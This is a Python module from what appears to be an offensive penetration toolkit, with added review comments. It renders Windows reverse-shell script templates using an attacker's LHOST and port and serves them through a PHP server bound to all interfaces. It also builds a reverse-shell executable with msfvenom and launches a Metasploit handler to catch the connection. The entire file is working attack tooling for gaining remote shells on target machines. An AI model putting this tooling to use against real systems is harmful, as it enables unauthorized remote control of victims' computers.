#!/usr/bin/env python3
import os
import json
import subprocess as subp
from modules.sftp import sftp
# ANSI SGR escape sequences used to colour the terminal output.
R = '\033[31m' # red
G = '\033[32m' # green
C = '\033[36m' # cyan
W = '\033[0m' # reset: clears colour/attributes (not literally white)
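def rshell(win):
    """Interactive menu for the Windows reverse-shell script templates.

    Lists every file found under ``scripts/windows/reverse_shell``, reads a
    choice from stdin, looks the chosen file up in
    ``conf/rshell_scripts.json`` and prompts for the values that entry asks
    for. Everything collected is stored as attributes on ``rshell`` itself
    (``rshell.chosen``, ``rshell.lhost``, ...) because ``rshell_output()``
    and ``msf()`` read their inputs from there.

    Recognised commands: ``clear``, ``back``, ``help``, ``exit``/``quit``,
    an empty line (ignored) or the number of a listed script.

    Args:
        win: Zero-argument callable invoked when the operator types
            ``back``; its result is returned.

    Returns:
        The result of ``win()`` on ``back``, or of the nested ``rshell(win)``
        call on ``help``. The loop does not end otherwise.
    """
    print('\n', end='')
    rs_scripts = []
    for _dirpath, _dirnames, filenames in os.walk('scripts/windows/reverse_shell'):
        rs_scripts.extend(filenames)
    # enumerate() keeps the printed number equal to the list position even
    # when two sub-directories hold a file of the same name; list.index()
    # would print the first match's number for both.
    for number, item in enumerate(rs_scripts):
        print(G + '[{}] '.format(number) + C + item)

    while True:
        try:
            rshell_choice = input(G + '\nfs[windows/reverse_shell] > ' + W)

            if rshell_choice == 'clear':
                os.system('clear')
            elif rshell_choice == 'back':
                return win()
            elif rshell_choice == 'help':
                return rshell(win)
            elif rshell_choice == '':
                pass
            elif rshell_choice in ('exit', 'quit'):
                quit()
            # int() raises ValueError for non-numeric text, handled below.
            # The lower bound matters: without it "-1" silently selected the
            # last script and a larger negative number raised an uncaught
            # IndexError.
            elif 0 <= int(rshell_choice) <= len(rs_scripts) - 1:
                with open('conf/rshell_scripts.json', 'r') as json_file:
                    options = json.load(json_file)
                rshell.chosen = rs_scripts[int(rshell_choice)]
                for k, v in options.items():
                    # NOTE(review): substring test, so every config key that
                    # occurs anywhere in the file name matches and the block
                    # below runs once per matching key.
                    if k in rshell.chosen:
                        try:
                            sftp_state = v['sftp']
                            msf_state = v['msf']
                            desc = v['desc']
                            rshell.module = v['module']
                            rshell.srv_state = v['srv']
                            rshell.target = v['target']
                        except KeyError:
                            # NOTE(review): a missing key is ignored here, so
                            # the names after it keep a value from an earlier
                            # selection or stay unset and fail further down.
                            # Left unchanged because the config schema is not
                            # visible from this file.
                            pass

                        print('\n', end = '')
                        print(G + '[+]' + C + ' Script : ' + W + rshell.chosen + '\n')
                        print(G + '[+]' + C + ' Info : ' + W + desc + '\n')

                        if sftp_state == 1:
                            sftp()

                        if msf_state == 1:
                            print(G + '[+]' + C + ' Module : ' + W + rshell.module + '\n')
                            rshell.payload = input(G + '[+]' + C + ' Payload : ' + W)
                            rshell.lhost = input(G + '[+]' + C + ' LHOST : ' + W)
                            rshell.lport = input(G + '[+]' + C + ' LPORT : ' + W)

                        if rshell.srv_state == 1:
                            rshell.srvhost = input(G + '[+]' + C + ' SRVHOST : ' + W)
                            rshell.srvport = input(G + '[+]' + C + ' SRVPORT : ' + W)
                        else:
                            rshell.php_port = input(G + '[+]' + C + ' PHP Server Port : ' + W)
                            print(G + '[+]' + C + ' Starting PHP Server...' + W)
                            # NOTE(review): this listens on every interface and,
                            # with no docroot argument, PHP's built-in server
                            # serves the current working directory, so conf/ and
                            # scripts/ are reachable as well as the generated
                            # files. The child is never waited on or terminated,
                            # its stdout pipe is never read, and the port string
                            # is not validated.
                            subp.Popen(['php', '-S', '0.0.0.0:{}'.format(rshell.php_port)], stdout=subp.PIPE)

                        rshell.filename = input(G + '[+]' + C + ' Filename (Without Extension) : ' + W)
                        rshell.script_path = '/scripts/windows/reverse_shell/' + rshell.chosen
                        rshell_output()
                        msf()
            else:
                print('\n' + R + '[-]' + C + ' Invalid Input...' + W)
        except ValueError:
            # Non-numeric menu input ends up here; so does a malformed config
            # file, since json.JSONDecodeError is a ValueError subclass.
            print('\n' + R + '[-]' + C + ' Invalid Input...' + W)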
def rshell_output():
    """Render the selected template and save it under ``output/``.

    Reads the template at ``os.getcwd() + rshell.script_path``, replaces the
    placeholder tokens with the values ``rshell()`` stored on itself, writes
    the result to ``output/<rshell.chosen>`` and prints the absolute path of
    the generated file.

    Placeholders: ``SRVHOST`` and ``SRVPORT`` when ``rshell.srv_state == 1``,
    otherwise ``LHOST`` and ``PHPPORT``. Values are inserted verbatim, with
    no escaping or validation.
    """
    template_path = os.getcwd() + rshell.script_path
    with open(template_path, 'r') as template:
        rendered = template.read()

    if rshell.srv_state == 1:
        substitutions = (
            ('SRVHOST', rshell.srvhost),
            ('SRVPORT', rshell.srvport),
        )
    else:
        substitutions = (
            ('LHOST', rshell.lhost),
            ('PHPPORT', rshell.php_port),
        )
    for token, value in substitutions:
        rendered = rendered.replace(token, value)
    # NOTE(review): FILENAME is treated as common to both branches; msf()
    # uses rshell.filename in both of its branches too. Confirm against the
    # original file's indentation.
    rendered = rendered.replace('FILENAME', rshell.filename)

    relative_out = 'output/{}'.format(rshell.chosen)
    with open(relative_out, 'w') as generated:
        generated.write(rendered)

    outfile_path = os.getcwd() + '/' + relative_out
    print(G + '[+]' + C + ' Script Generated : ' + W + outfile_path)
def msf():
    """Ask whether to start Metasploit and, on ``y``, run it.

    Reads its inputs from the attributes ``rshell()`` stored on itself.
    When ``rshell.srv_state == 1`` it runs ``msfconsole`` once, with the
    SRVHOST/SRVPORT/URIPATH options set. Otherwise it first runs
    ``msfvenom`` to write ``<rshell.filename>.exe`` relative to the current
    working directory, then runs ``msfconsole``. Any answer other than
    ``y`` does nothing.

    NOTE(review): the prompt values are formatted verbatim into the single
    ``-x`` string, whose commands are separated by ``;``. A ``;`` inside
    any value would therefore be read as a command separator. The exit
    codes of both tools are ignored.
    """
    msf_choice = input(G + '[+]' + C + ' Start Metasploit Framework [y/n]: ' + W)
    if msf_choice != 'y':
        # 'n' and every other answer are no-ops.
        return

    print('\n', end='')
    if rshell.srv_state == 1:
        console_cmds = (
            'use {}; '
            'set payload {}; '
            'set LHOST {}; '
            'set LPORT {}; '
            'set target {}; '
            'set SRVHOST {}; '
            'set SRVPORT {}; '
            'set URIPATH {}; '
            'exploit -j'
        ).format(
            rshell.module,
            rshell.payload,
            rshell.lhost,
            rshell.lport,
            rshell.target,
            rshell.srvhost,
            rshell.srvport,
            rshell.filename,
        )
        subp.call(['msfconsole', '-q', '-x', console_cmds])
    else:
        print(G + '[+]' + C + ' Generating Payload...' + W + '\n')
        venom_argv = [
            'msfvenom',
            '-p', '{}'.format(rshell.payload),
            'LHOST={}'.format(rshell.lhost),
            'LPORT={}'.format(rshell.lport),
            '-f', 'exe',
            '-o', '{}.exe'.format(rshell.filename),
        ]
        subp.call(venom_argv)

        console_cmds = (
            'use {}; '
            'set payload {}; '
            'set LHOST {}; '
            'set LPORT {}; '
            'set target {}; '
            'exploit -j'
        ).format(
            rshell.module,
            rshell.payload,
            rshell.lhost,
            rshell.lport,
            rshell.target,
        )
        subp.call(['msfconsole', '-q', '-x', console_cmds])